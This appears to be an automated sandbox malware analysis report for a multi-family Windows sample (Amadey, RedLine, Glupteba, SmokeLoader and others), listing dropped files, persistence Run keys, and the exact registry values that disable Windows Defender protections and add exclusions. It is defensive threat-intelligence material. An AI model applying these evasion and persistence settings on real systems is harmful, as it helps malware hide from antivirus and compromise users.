Malware Analysis Report

2025-01-23 10:16

Sample ID 231010-ysdx7aaf79
Target dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f
SHA256 dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat rootkit spyware stealer trojan upx lutyr magia
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f

Threat Level: Known bad

The file dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat rootkit spyware stealer trojan upx lutyr magia

RedLine payload

SectopRAT

Healer

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

Modifies Windows Defender Real-time Protection settings

Amadey

SectopRAT payload

Detects Healer an antivirus disabler dropper

Detected google phishing page

DcRat

Windows security bypass

Glupteba

Glupteba payload

RedLine

Modifies boot configuration data using bcdedit

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Reads user/profile data of web browsers

Executes dropped EXE

Windows security modification

Loads dropped DLL

Checks computer location settings

UPX packed file

Checks installed software on the system

Manipulates WinMonFS driver.

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMon driver.

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

Suspicious behavior: GetForegroundWindowSpam

Modifies Internet Explorer settings

Modifies system certificate store

Suspicious behavior: MapViewOfSection

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 20:02

Reported

2023-10-10 20:06

Platform

win7-20230831-en

Max time kernel

150s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detected google phishing page

phishing google

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\9E85.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\9E85.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\9E85.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\9E85.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\9E85.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\9E85.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9398.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\956D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9697.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9A9D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9E85.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CE8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1BA4.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\11A4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1BA4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\20D3.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9398.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9398.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CE8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CE8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CE8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CE8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CE8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CE8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\9E85.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\9E85.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\9398.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\bcdedit.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe N/A N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20231010200457.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000008c66dacf3255794896cbcb5ac20a71400000000002000000000010660000000100002000000007daf06bbc6d3bfce94477d8d28fd92d39f9d2f4ba01952f056d4edd9837deb9000000000e8000000002000020000000e400ede4c6264a6537a81c26267b1fd337e45eb816b7e29458c5d32fccb4b4a890000000fd66f977898cfb0639504475487014e8566bcf2c84328c77c17e33c71e7a9b6d26a23d0559300b985cdf23e70c848d335f41198308f36d2512075210b89abe087004e18f0416f863534aed3297b439b6d2d4e2eafae94530accdb8db09e25d4dccd57260d41ed5685419ab19279674ef06957e5eb3fb1dc495688c043ca7d0540d5ba25242f32cfa4d45daaf13ade49f40000000308419155235ef7656477f5a0fbe4cf18da0558e50c063e42eb2fbc3570dfd0852c89f987fe90348db1efb8b8ce47fc7120ddc41123e95854fb167cb4d52773a C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3D71B9B1-67A8-11EE-855F-5AE3C8A3AD14} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
